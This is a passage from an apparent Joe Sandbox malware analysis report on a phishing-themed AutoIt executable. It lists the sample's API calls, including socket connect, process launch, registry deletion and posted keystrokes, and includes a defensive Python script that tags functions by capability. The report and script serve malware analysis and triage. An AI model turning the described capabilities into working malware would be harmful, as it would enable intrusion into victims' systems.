                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
                    • Instruction ID: dc352e4c369b409def19a0b36e159e74bb1ae7b70ef5e69d8437469e0a00062e
                    • Opcode Fuzzy Hash: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
                    • Instruction Fuzzy Hash: 135159A05857D53DFB3383349C55BB6BEE95B06384F0CA5C9E1D5A68C2C294EC88E750
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: 4d853ee07b67366ae1e97638a11108d5944fd882eb031f01dc78baebc991aa77
                    • Instruction ID: b30deaf4e88fe65f22d7f896a20e25309e225fbcfeafd83392d1326d81d9e175
                    • Opcode Fuzzy Hash: 4d853ee07b67366ae1e97638a11108d5944fd882eb031f01dc78baebc991aa77
                    • Instruction Fuzzy Hash: C041A1B6D20624B5CF11EBB4B8469DFB7B89F05310F10A866F918F3162E638A744C7A5
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D8E3
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E5D919
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E5D92A
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E5D9AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,$DllGetClassObject
                    • API String ID: 753597075-2867008933
                    • Opcode ID: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
                    • Instruction ID: f1d070643ae454bcffd505ad03362c4bf7ee20673866cdb98e3bd820d90da02d
                    • Opcode Fuzzy Hash: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
                    • Instruction Fuzzy Hash: 9F41B271604204EFDB24DF51CCC4A9A7BB9EF85306F1094A9ED05AF206D7B0DD48CBA0
                    APIs
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E636DB,?), ref: 00E646CC
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E636DB,?), ref: 00E646E5
                    • lstrcmpiW.KERNEL32(?,?), ref: 00E636FB
                    • _wcscmp.LIBCMT ref: 00E63717
                    • MoveFileW.KERNEL32(?,?), ref: 00E6372F
                    • _wcscat.LIBCMT ref: 00E63777
                    • SHFileOperationW.SHELL32(?), ref: 00E637E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 4894391b781be8d20ac48ccaf179a3943cadae42e9adb4ab9ff29ecd496a2404
                    • Instruction ID: 9fd96dc0baec959689429392d32e290474f0d6ced857a62ef2e208d0be586ee7
                    • Opcode Fuzzy Hash: 4894391b781be8d20ac48ccaf179a3943cadae42e9adb4ab9ff29ecd496a2404
                    • Instruction Fuzzy Hash: C74191B2548345AED751EF64E441ADFB7E8EF89380F00292EB489E3151EA34E788C756
                    APIs
                    • _memset.LIBCMT ref: 00E872DC
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87383
                    • IsMenu.USER32(?), ref: 00E8739B
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E873E3
                    • DrawMenuBar.USER32 ref: 00E873F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 8ffea39a9e8d1ad6bd90121d805ce1cf9f7975b6a278319cb4badda2b21af37c
                    • Instruction ID: 6547b0d1bbefbc44452504492f55705f891432b0995ef8ae87225f7adb52cb66
                    • Opcode Fuzzy Hash: 8ffea39a9e8d1ad6bd90121d805ce1cf9f7975b6a278319cb4badda2b21af37c
                    • Instruction Fuzzy Hash: D0413775A04208EFDB20EF50D884E9ABBF8FB04318F149029EDA9A7261D731ED55DB90
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E8105C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E81086
                    • FreeLibrary.KERNEL32(00000000), ref: 00E8113D
                      • Part of subcall function 00E8102D: RegCloseKey.ADVAPI32(?), ref: 00E810A3
                      • Part of subcall function 00E8102D: FreeLibrary.KERNEL32(?), ref: 00E810F5
                      • Part of subcall function 00E8102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E81118
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E810E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: f3b6739c844cd6b2c3c4f1d132aa5fb1f64dca821ebd80c30219bb348675c3e9
                    • Instruction ID: d36755709390251e2eec8c59d9c3a86b189b505acd7a8599faaf4f8552e3a2b4
                    • Opcode Fuzzy Hash: f3b6739c844cd6b2c3c4f1d132aa5fb1f64dca821ebd80c30219bb348675c3e9
                    • Instruction Fuzzy Hash: 28312BB1901109BFDB15DB91DC89EFFB7BCEF08344F1011A9E509F2151EA749E8A9BA0
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E8631E
                    • GetWindowLongW.USER32(00FC5FB0,000000F0), ref: 00E86351
                    • GetWindowLongW.USER32(00FC5FB0,000000F0), ref: 00E86386
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E863B8
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E863E2
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E863F3
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E8640D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                    • Instruction ID: 6bdde402addb06810fb9b7eeacd9569e9deadb137a833fe44d78066767b986bf
                    • Opcode Fuzzy Hash: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                    • Instruction Fuzzy Hash: A63114316042009FDB21DF19DC84F5437E1FB8A714F181174F518AF2B2CB62A885EB51
                    APIs
                      • Part of subcall function 00E77EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77ECB
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E762DC
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E762EB
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76324
                    • connect.WSOCK32(00000000,?,00000010), ref: 00E7632D
                    • WSAGetLastError.WSOCK32 ref: 00E76337
                    • closesocket.WSOCK32(00000000), ref: 00E76360
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76379
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 76fd46c32c94010b7efd513151d1b29f1439d54f8e41532b49de906971d28dab
                    • Instruction ID: 95d1056370bc32e8f533818a76bb5c8496ceabc80a675e690edf2b78e3ada37f
                    • Opcode Fuzzy Hash: 76fd46c32c94010b7efd513151d1b29f1439d54f8e41532b49de906971d28dab
                    • Instruction Fuzzy Hash: 08319331600518AFDB149F64CC85BBE77E9EB84728F049069FD49B7292DB70AC48CBA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: b97a3536b15371a244e63f5bcbc0fd52127c17bce5b30df8aa55a004bd58e603
                    • Instruction ID: aaeab0aa2bf561f51c296b973b8e874a0ad653fbc1f26ef92ccae4da5ede9813
                    • Opcode Fuzzy Hash: b97a3536b15371a244e63f5bcbc0fd52127c17bce5b30df8aa55a004bd58e603
                    • Instruction Fuzzy Hash: 2221493220862176D621AB359C02FF773D89F91315F506839FD8AB61C3EB949D8AC292
                    APIs
                      • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                      • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                      • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E87664
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E87671
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E8767C
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E8768B
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E87697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 6270f767528ac35fbf7f767b239065c2731c27f4d14c3c838d9e59ab4aef2471
                    • Instruction ID: dd033286d5d8c8f5b911770c6186f2da3d24ad2ce9abe582ae6140bad93ff15a
                    • Opcode Fuzzy Hash: 6270f767528ac35fbf7f767b239065c2731c27f4d14c3c838d9e59ab4aef2471
                    • Instruction Fuzzy Hash: 1511E2B2150219BFEF109F64CC81EE77F6DEF08358F115125BA48B20A0D772AC21EBA0
                    APIs
                    • _memset.LIBCMT ref: 00E8B678
                    • _memset.LIBCMT ref: 00E8B687
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EC6F20,00EC6F64), ref: 00E8B6B6
                    • CloseHandle.KERNEL32 ref: 00E8B6C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID: o$do
                    • API String ID: 3277943733-2180341428
                    • Opcode ID: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                    • Instruction ID: 8e1e7cb207563d8b722a40e88ff1fa79b231157643d341ef199c036d5d164bdc
                    • Opcode Fuzzy Hash: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                    • Instruction Fuzzy Hash: B4F05EB2740354BEF2102B62BC06FBB3B9CEB08354F005038FA08F51A2D7729C0587A8
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E241D2,?), ref: 00E24123
                    • GetProcAddress.KERNEL32(00000000), ref: 00E2412A
                    • EncodePointer.KERNEL32(00000000), ref: 00E24136
                    • DecodePointer.KERNEL32(00000001,00E241D2,?), ref: 00E24153
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: 11c65d3e17654bc8a9e3eccb958b68873766001af903e943ca32c0154de0fd2d
                    • Instruction ID: ceabe8e585647aac01e15cabad5ed8fff88652eb70be55477ef3160756d17a9c
                    • Opcode Fuzzy Hash: 11c65d3e17654bc8a9e3eccb958b68873766001af903e943ca32c0154de0fd2d
                    • Instruction Fuzzy Hash: 1AE01A70692300AFEF116B72EC0DF443AA4AB16B07F109438F545F50F0CBB681899F00
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E240F8), ref: 00E241F8
                    • GetProcAddress.KERNEL32(00000000), ref: 00E241FF
                    • EncodePointer.KERNEL32(00000000), ref: 00E2420A
                    • DecodePointer.KERNEL32(00E240F8), ref: 00E24225
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                    • Instruction ID: 8b4bb4541e5540d7f2befdb45cf680dd5c27ca58772265c1dce33d2b2e73f66d
                    • Opcode Fuzzy Hash: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                    • Instruction Fuzzy Hash: C6E07EB0592300AEEA109B73AD0DB453AA4AB04B46F18902AF115F10B0CBB786099B14
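The records in this section are Joe Sandbox's per-function API listings: each "APIs" block names the imports one function calls (with module, observed arguments and call-site address), followed by the API ID summary, the String ID and the opcode/instruction fuzzy hashes used for similarity matching. Read as a whole, several of them are recognisably runtime rather than payload: the function that compares strings against #OnAutoItStartRegister, #notrayicon and #requireadmin with __wcsnicmp is handling AutoIt script directives; the socket/ioctlsocket/connect routine toggles ioctlsocket command 0x8004667E, which is FIONBIO (non-blocking mode), around the connect; and the GetKeyboardState/PostMessageW functions post WM_KEYDOWN (0x100) and WM_KEYUP (0x101) for VK_SHIFT (0x10), VK_CONTROL (0x11), VK_MENU (0x12) and VK_LWIN (0x5B), i.e. synthetic keyboard input. The Python below is an added example, not code from Joe Sandbox, from AutoIt or from the sample: it parses this record format from a constructed excerpt of the records above and attaches coarse capability tags so that a long function list can be triaged in bulk. The tag names, the rule set and the module lists are this example's own assumptions; the message, virtual-key and FIONBIO constants are the standard Win32 values.

```python
"""Parse Joe Sandbox per-function API records and tag what each function can do.
Added example, not part of the report or of the sample. SAMPLE is constructed from records
shown above; tag rules are this example's own assumptions, the Win32 constants are standard."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
  • Part of subcall function 00E77EA0: inet_addr.WSOCK32(00000000,?,00000000), ref: 00E77ECB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E762DC
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76324
• WSAGetLastError.WSOCK32 ref: 00E76337
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• Opcode ID: 76fd46c32c94010b7efd513151d1b29f1439d54f8e41532b49de906971d28dab
APIs
• GetKeyboardState.USER32(?), ref: 00E610EB
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E61178
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E611FA
Similarity
• Opcode ID: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
APIs
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• Opcode ID: b97a3536b15371a244e63f5bcbc0fd52127c17bce5b30df8aa55a004bd58e603
"""
# "• Name.MODULE(args), ref: ADDR"; the parentheses and the comma before "ref" are optional.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
FIELD_LINE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID|Instruction Fuzzy Hash): ?(.*)$")
WM = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
FIONBIO = 0x8004667E  # ioctlsocket command: put the socket into non-blocking mode
AUTOIT_DIRECTIVES = {"#requireadmin", "#notrayicon", "#OnAutoItStartRegister"}
NETWORK_MODULES = {"WSOCK32", "WS2_32", "WININET", "WINHTTP"}
PROCESS_APIS = {"CreateProcessW", "CreateProcessA", "ShellExecuteExW", "ShellExecuteW"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: Optional[str] = None  # set for "Part of subcall function" lines

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

def parse_records(text: str) -> list:
    """Split report text into records; each record starts at an 'APIs' heading."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FuncRecord()
            records.append(cur)
        elif cur is not None:
            if m := API_LINE.match(line):
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            elif m := FIELD_LINE.match(line):
                cur.fields[m.group(1)] = m.group(2).strip()
    return records

def _hex(arg: str) -> Optional[int]:
    try:  # arguments are hex words, '?' or string literals; only hex decodes
        return int(arg, 16)
    except ValueError:
        return None

def decode_key_messages(rec: FuncRecord) -> list:
    """(message, virtual key) pairs for Post/SendMessage calls carrying WM_KEYDOWN/WM_KEYUP."""
    out = []
    for c in rec.apis:
        if c.name in ("PostMessageW", "SendMessageW") and len(c.args) >= 3:
            msg, vk = _hex(c.args[1]), _hex(c.args[2])
            if msg in WM:
                out.append((WM[msg], VK.get(vk, "?" if vk is None else "VK_%02X" % vk)))
    return out

# Capability rules: (tag, predicate over a FuncRecord). Example heuristics, not Joe Sandbox's.
RULES = [
    ("network", lambda r: any(c.module in NETWORK_MODULES for c in r.apis)),
    ("nonblocking-socket", lambda r: any(c.name == "ioctlsocket" and len(c.args) > 1
                                         and _hex(c.args[1]) == FIONBIO for c in r.apis)),
    ("process-launch", lambda r: any(c.name in PROCESS_APIS for c in r.apis)),
    ("registry-write", lambda r: any(c.name.startswith(("RegDelete", "RegSetValue")) for c in r.apis)),
    ("dynamic-api-resolution", lambda r: any(c.name in ("LoadLibraryExW", "GetProcAddress") for c in r.apis)),
    ("keystroke-injection", lambda r: bool(decode_key_messages(r))),
    ("autoit-runtime", lambda r: bool(set(r.fields.get("String ID", "").split("$")) & AUTOIT_DIRECTIVES)),
]

def tag_record(rec: FuncRecord) -> set:
    return {tag for tag, hit in RULES if hit(rec)}

def summarize(text: str) -> list:
    """[(opcode-id prefix, sorted tags)] for every record in the text."""
    return [(r.fields.get("Opcode ID", "")[:12], sorted(tag_record(r))) for r in parse_records(text)]
```

Feeding the saved report text to summarize() gives one (opcode-id, tags) pair per function. Records that carry only the autoit-runtime tag or no tag at all are interpreter and GUI boilerplate and can be set aside, which leaves the network, process-launch, registry-write and dynamic-api-resolution functions for manual review; the opcode-id prefix is kept in the output so that a tagged record can be matched back to the same function in another report of a different sample.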
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: d71ad6ed913707e2b815a32644a8879520e2049a879510b7f1fec780915a6271
                    • Instruction ID: f278bed400bf711c3860e0191e5acd62b60ed64ba440b91d9478668f323b4e2b
